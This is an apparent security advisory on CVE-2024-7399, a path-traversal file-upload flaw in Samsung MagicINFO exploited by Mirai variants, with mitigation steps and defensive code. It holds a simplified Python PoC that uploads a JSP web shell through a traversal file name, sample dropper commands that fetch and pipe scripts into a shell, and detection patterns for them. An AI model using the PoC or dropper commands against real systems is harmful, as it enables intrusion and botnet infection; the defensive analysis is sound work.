
A critical vulnerability in Samsung’s MagicINFO 9 Server has been confirmed by Huntress as actively exploited in the wild, including against servers running version 21.1050.0, the build Samsung had shipped as the fix in August 2024. The flaw, tracked as CVE-2024-7399, allows unauthenticated remote code execution (RCE) and has been folded into Mirai botnet campaigns. Proof-of-concept (PoC) exploit code was published by SSD Disclosure on April 30, 2025, prompting urgent mitigation efforts.
Technical Analysis of CVE-2024-7399
The vulnerability is a path traversal in the server's unauthenticated file-upload handling and carries a CVSS score of 8.8. The file name supplied in a multipart upload is not canonicalized, so `../` sequences let an attacker write an arbitrary file, typically a JSP web shell, under the web root and then execute it with a single GET request. Attackers leverage this to deploy Mirai variants such as LZRD, which download secondary payloads like `ohshit.sh` and `boatnet` via `wget` or `curl`. Arctic Wolf reported live attacks targeting unpatched systems, with the dropped binaries enrolling the host in the botnet and scanning for further targets.
Exploitation requires no authentication, so internet-facing MagicINFO servers are high-risk targets. Note that `/magicInfo/j_spring_security_check` is the Spring Security login handler rather than the upload endpoint; the SSD Disclosure proof of concept posts to the server's `SWUpdateFileUploader` servlet. The core of the PoC is a multipart POST whose file name carries the traversal, as in this simplified example (bracketed values are placeholders, and the exact parameter names and destination path are in the SSD advisory):
import requests

# Placeholders: [target] is the MagicINFO host, [webroot] the directory the traversal must reach.
target = "http://[target]/MagicInfo/servlet/SWUpdateFileUploader"
# The traversal is in the file name, which the server joins to its upload directory unsanitized.
with open("shell.jsp", "rb") as fh:
    resp = requests.post(target, files={"file": ("../../[webroot]/shell.jsp", fh)}, timeout=10)
print(resp.status_code)
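To make the defect concrete, the following is an added illustration in Python (my own code, not code from Samsung, SSD Disclosure or any of the reports cited here) of why an unsanitized upload file name escapes the upload directory, placed beside a hardened version of the same join. The directory names are assumptions chosen for the example and do not model the real MagicINFO layout.

```python
import posixpath

# Upload directory assumed for the example; the real MagicINFO layout is not modelled here.
UPLOAD_ROOT = "/opt/magicinfo/upload"
# Assumed location of the servlet container's web root, the directory an attacker aims for.
WEB_ROOT = "/opt/tomcat/webapps/ROOT"


def naive_target_path(upload_root, client_filename):
    """Vulnerable pattern: join the client-supplied name to the upload directory as-is.
    normpath then resolves each '..' against the directories above upload_root."""
    return posixpath.normpath(posixpath.join(upload_root, client_filename))


def safe_target_path(upload_root, client_filename):
    """Hardened pattern: drop any directory part the client sent, refuse names that are
    still unusable or that would be served as server-side code, and re-check containment
    as defence in depth."""
    base = posixpath.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        raise ValueError(f"rejected file name: {client_filename!r}")
    if base.lower().endswith((".jsp", ".jspx", ".war")):
        raise ValueError(f"rejected server-executable content: {base!r}")
    root = posixpath.normpath(upload_root)
    candidate = posixpath.normpath(posixpath.join(root, base))
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes upload root: {candidate!r}")
    return candidate


def escapes_root(upload_root, path):
    """True when path, after normalisation, is not inside upload_root."""
    root = posixpath.normpath(upload_root)
    return posixpath.commonpath([root, posixpath.normpath(path)]) != root


def traversal_name_for(upload_root, destination):
    """Build the '../'-prefixed name an attacker would send to land a file at destination."""
    hops = len(posixpath.normpath(upload_root).strip("/").split("/"))
    return "../" * hops + destination.strip("/")


if __name__ == "__main__":
    evil = traversal_name_for(UPLOAD_ROOT, WEB_ROOT + "/shell.jsp")
    landed = naive_target_path(UPLOAD_ROOT, evil)
    print(f"client sent {evil!r}")
    print(f"vulnerable join writes to {landed}; escaped upload root: {escapes_root(UPLOAD_ROOT, landed)}")
    try:
        safe_target_path(UPLOAD_ROOT, evil)
    except ValueError as err:
        print("hardened join:", err)
```

The hardened version does not try to strip `../` from the name; it discards every directory component and then still verifies containment, because filtering known-bad sequences is exactly the approach that encoded or mixed-separator variants get past.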
Mitigation and Response
Samsung released version 21.1050 in August 2024 to address the flaw, but the exploitation Huntress confirmed was against 21.1050.0 itself, so that patch level cannot be treated as safe. Samsung subsequently shipped 21.1052.0, with the incomplete fix tracked separately as CVE-2025-4632; servers should be on that build or later. Immediate actions include:
- Isolating MagicINFO servers from internet access
- Applying the latest vendor build and verifying the installed version afterwards, rather than assuming an update ran
- Monitoring for child processes of the MagicINFO service such as `wget`, `curl` or a shell fetching and running files from temporary or world-writable directories
- Inspecting web server logs for unauthenticated POSTs to the upload servlet and for requests to JSP files that are not part of the application
- Checking the web root for recently created `.jsp` files, which is the artefact a successful exploit leaves behind
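The two log hunts in the list above, as an added example in Python that is not code from Huntress, Arctic Wolf or any other source cited here: a combined-format web access log is checked for a POST to a watched endpoint followed shortly by a request for a JSP, and a process-execution log is checked for the wget/curl download-and-execute pattern. The watched endpoint list, the sample hosts, timestamps, paths and process lines are all constructed for the example and are not indicators from a real incident.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log in combined format. Hosts, paths and timestamps are invented
# for this example and are not indicators from a real incident.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [06/May/2025:10:14:02 +0000] "POST /MagicInfo/servlet/SWUpdateFileUploader HTTP/1.1" 200 152 "-" "python-requests/2.31"
203.0.113.7 - - [06/May/2025:10:14:03 +0000] "GET /MagicInfo/shell.jsp?cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.31"
198.51.100.4 - - [06/May/2025:10:20:11 +0000] "POST /MagicInfo/j_spring_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [06/May/2025:10:20:12 +0000] "GET /MagicInfo/home.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [06/May/2025:11:02:40 +0000] "GET /MagicInfo/..%2f..%2fWEB-INF/web.xml HTTP/1.1" 404 0 "-" "curl/8.4"
"""

# Constructed process-execution log (Linux-style paths). The script and binary names echo the
# payload names reported in the article; the address is a documentation-range placeholder.
SAMPLE_PROC_LOG = """\
2025-05-06T10:14:05Z user=magicinfo cmd="wget http://192.0.2.10/ohshit.sh -O /tmp/ohshit.sh"
2025-05-06T10:14:06Z user=magicinfo cmd="sh /tmp/ohshit.sh"
2025-05-06T10:14:09Z user=magicinfo cmd="curl -fsSL http://192.0.2.10/boatnet | sh"
2025-05-06T10:30:00Z user=root cmd="curl -s https://updates.example.com/status.json"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints to pair with a later JSP fetch: the upload servlet named in the SSD advisory and the
# Spring login handler. An assumed watch-list for the example, not a vendor-published indicator set.
WATCHED_POST_PATHS = {"/magicinfo/servlet/swupdatefileuploader", "/magicinfo/j_spring_security_check"}
TRAVERSAL_RE = re.compile(r"\.\.(/|\\|%2f|%5c)|%2e%2e(/|%2f)", re.IGNORECASE)
WINDOW = timedelta(minutes=5)


def parse_access(line):
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def hunt_access_log(lines):
    """Return (ip, reason, path) findings: a traversal sequence in any request path, and a
    successful GET of a .jsp from an IP that POSTed to a watched endpoint within WINDOW."""
    findings = []
    last_post = {}  # ip -> timestamp of its most recent POST to a watched endpoint
    for line in lines:
        ev = parse_access(line)
        if ev is None:
            continue
        ip, path = ev["ip"], ev["path"]
        route = path.split("?", 1)[0].lower()
        if TRAVERSAL_RE.search(path):
            findings.append((ip, "traversal sequence in request path", path))
        if ev["method"] == "POST" and route in WATCHED_POST_PATHS:
            last_post[ip] = ev["ts"]
        elif ev["method"] == "GET" and route.endswith((".jsp", ".jspx")) and ev["status"] == 200:
            seen = last_post.get(ip)  # exclude the application's own JSP pages when tuning this
            if seen is not None and ev["ts"] - seen <= WINDOW:
                findings.append((ip, "JSP fetched shortly after POST to watched endpoint", path))
    return findings


CMD_RE = re.compile(r'cmd="([^"]*)"')
DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")
SCRIPT_URL_RE = re.compile(r"https?://\S+\.(sh|bin)\b", re.IGNORECASE)
DROP_DIR_RE = re.compile(r"/(tmp|var/tmp|dev/shm)/")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash)\b")
SHELL_RUN_RE = re.compile(r"^(sh|bash)\s")


def hunt_process_log(lines):
    """Return command lines matching the dropper pattern: wget/curl fetching a script or binary,
    writing into a scratch directory or piping into a shell, or a shell run from such a directory."""
    flagged = []
    for line in lines:
        m = CMD_RE.search(line)
        if not m:
            continue
        cmd = m.group(1)
        if DOWNLOADER_RE.search(cmd) and (
            SCRIPT_URL_RE.search(cmd) or DROP_DIR_RE.search(cmd) or PIPE_TO_SHELL_RE.search(cmd)
        ):
            flagged.append(cmd)
        elif SHELL_RUN_RE.match(cmd) and DROP_DIR_RE.search(cmd):
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for finding in hunt_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print("ACCESS", *finding)
    for cmd in hunt_process_log(SAMPLE_PROC_LOG.splitlines()):
        print("PROC", cmd)
```

The access-log rule pairs events by source IP rather than flagging every JSP request, because a Java application serves JSPs legitimately; the pairing with a preceding upload or login POST inside a short window is what makes the hit worth a look. The process rule deliberately ignores a plain `curl` of a JSON status URL so that routine update checks do not drown the signal.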
Network defenders should prioritize hunting for IoCs associated with Mirai campaigns, including known file hashes and command-and-control IP addresses. The attack chain aligns with typical botnet propagation tactics, where compromised devices are weaponized for DDoS attacks.
Broader Threat Context
This incident reflects wider trends in IoT exploitation, with threat actors rapidly weaponizing disclosed vulnerabilities. The integration into Mirai’s infrastructure suggests automated scanning for vulnerable systems, similar to historical patterns observed in VPN and router attacks.
Earlier campaigns targeting Cisco ASA VPN appliances (CVE-2023-20269) and VMware Aria Operations for Networks (CVE-2023-34039) show the same attacker focus on exposed enterprise edge and management systems. The MagicINFO flaw is particularly concerning because the product drives digital signage deployments across retail, transportation, and corporate environments, where the server is often reachable from networks nobody thinks of as hostile.
Organizations using MagicINFO should conduct thorough compromise assessments, as initial access could enable follow-on ransomware or espionage activities. The vulnerability’s public PoC lowers the barrier for entry, making widespread exploitation likely in the short term.
Conclusion
CVE-2024-7399 represents a clear and present danger to organizations running unpatched MagicINFO servers. The combination of public exploit code, active botnet integration, and high CVSS score creates urgent remediation requirements. Defensive strategies must combine patching with network segmentation and continuous monitoring for anomalous activity.
This case underscores the importance of timely patch management for specialized enterprise software. As attack surfaces expand with IoT adoption, similar vulnerabilities in less-visible systems will continue attracting threat actor attention.
References
- “SSD Advisory – Samsung MagicINFO Unauthenticated RCE”, SSD Disclosure, 2025.
- “Samsung MagicINFO Flaw Now Actively Exploited by Mirai Botnet”, CyberInsider, 2025.
- Samsung Security Updates, Samsung, 2024.
- “CVE-2023-20269: Cisco ASA/FTD Zero-Day Exploited by Ransomware Groups”, Security Affairs, 2023.
- “VMware Aria Operations for Networks Flaw PoC Released”, Security Affairs, 2023.